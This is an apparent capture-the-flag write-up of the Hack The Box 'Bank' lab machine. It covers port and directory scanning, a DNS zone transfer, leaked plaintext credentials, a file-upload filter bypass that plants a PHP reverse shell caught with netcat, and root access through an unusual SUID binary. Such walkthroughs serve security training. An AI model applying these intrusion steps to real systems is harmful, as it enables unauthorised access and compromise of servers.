As usual, I started the initial enumeration by running a port scan using nmap looking for open ports and running services.
┌──(madhav㉿kali)-[~/ctf/htb/bank] └─$ nmap -sC -sV -oN nmap/initial 10.10.10.29 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-06 11:07 IST Nmap scan report for 10.10.10.29 (10.10.10.29) Host is up (0.15s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA) |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.7 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.13 seconds
We have three different ports open. We have SSH running on port 22, DNS running on port 53 and Apache httpd web server running on port 80. Let's start the enumeration with port 53 first.
DNS - TCP/UDP 53
The nmap scan does not give us any hostname, so I guessed that it might be
bank.htb and it works!
┌──(madhav㉿kali)-[~/ctf/htb/bank] └─$ dig axfr bank.htb @10.10.10.29 ; <<>> DiG 9.18.1-1-Debian <<>> axfr bank.htb @10.10.10.29 ;; global options: +cmd bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800 bank.htb. 604800 IN NS ns.bank.htb. bank.htb. 604800 IN A 10.10.10.29 ns.bank.htb. 604800 IN A 10.10.10.29 www.bank.htb. 604800 IN CNAME bank.htb. bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800 ;; Query time: 156 msec ;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP) ;; WHEN: Mon Jul 11 16:52:40 IST 2022 ;; XFR size: 6 records (messages 1, bytes 171)
I added all the hostnames to my
┌──(madhav㉿kali)-[~/ctf/htb] └─$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 10.10.10.29 bank.htb chris.bank.htb ns.bank.htb www.bank.htb
When we visit the url http://10.10.10.29/ in our web browser, we get the default Apache installation page.
But If we visit
http://bank.htb, we get a different website this time.
We have a website with a login form which runs on php. I tried logging in using some default credentials, but they didn't work. I also tried bypassing the login page using SQL Injection, but that also doesn't work.
Next I performed a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/htb] └─$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://bank.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 302) [Size: 7322] [--> login.php] /support.php (Status: 302) [Size: 3291] [--> login.php] /login.php (Status: 200) [Size: 1974] /uploads (Status: 301) [Size: 305] [--> http://bank.htb/uploads/] /assets (Status: 301) [Size: 304] [--> http://bank.htb/assets/] /logout.php (Status: 302) [Size: 0] [--> index.php] /inc (Status: 301) [Size: 301] [--> http://bank.htb/inc/] /server-status (Status: 403) [Size: 288] /balance-transfer (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/] =============================================================== Finished ===============================================================
We got many files and directories, but we cannot access most of them because it redirects us back to the login page. But we have a directory named
/balance-transfer which is also accessible to unauthenticated users.
/balance-transfer directory contains many .acc extension files which contain encrypted usernames and passwords. One of the file has an oddly different size and it contains the username and password in plain text.
┌──(madhav㉿kali)-[~/ctf/htb/bank] └─$ cat 68576f20e9732f1b2edc4df5b8533230.acc --ERR ENCRYPT FAILED +=================+ | HTB Bank Report | +=================+ ===UserAccount=== Full Name: Christos Christopoulos Email: email@example.com Password: !##HTBB4nkP4ssw0rd!## CreditCards: 5 Transactions: 39 Balance: 8842803 . ===UserAccount===
We can now use these credentials to login into the website. After logging in, we are given a dashboard.
Shell as www-data
In the Support section, we have an option to create a new support ticket where we can also upload files. But when we try uploading a php reverse shell, it gives us an error that php files are not allowed.
I checked the source code of the website, I found out a comment which says:
It means that we can upload
.php files by just changing the extension to
.htb I will be using the reverse shell by pentestmonkey.
This time the reverse shell was uploaded successfully. Now we can simply execute it from the attachment section.
After executing the shell, we will get a reverse shell back into our system.
┌──(madhav㉿kali)-[~/ctf/htb/bank] └─$ nc -lvnp 1337 listening on [any] 1337 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 49072 Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux 16:59:44 up 7:28, 0 users, load average: 0.00, 0.06, 0.06 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Next I upgraded this dumb shell to a fully interactive TTY using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")' Ctrl-Z stty raw -echo && fg reset export TERM=xterm stty rows 48 columns 179
Now that we have a fully interactive shell, we can read our user flag present in the home directory of user chris.
www-data@bank:/$ cat /home/chris/user.txt 2dca09f*************************
I checked for the files with SUID capabilities and got an unusual binary.
find / -type f -perm -u=s 2>/dev/null
We have a file named
emergency located in the
/var/htb/bin directory. First I ran the file command to check its file type.
www-data@bank:/$ file /var/htb/bin/emergency /var/htb/bin/emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
It is a 32-bit executable file. I tried running this binary and it directly gave us the root shell!
www-data@bank:/$ ./var/htb/bin/emergency # id uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data) # whoami root
We have a root shell and now we can read our final flag present in the
# cat /root/root.txt 83a3cee*************************
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Odom Sok.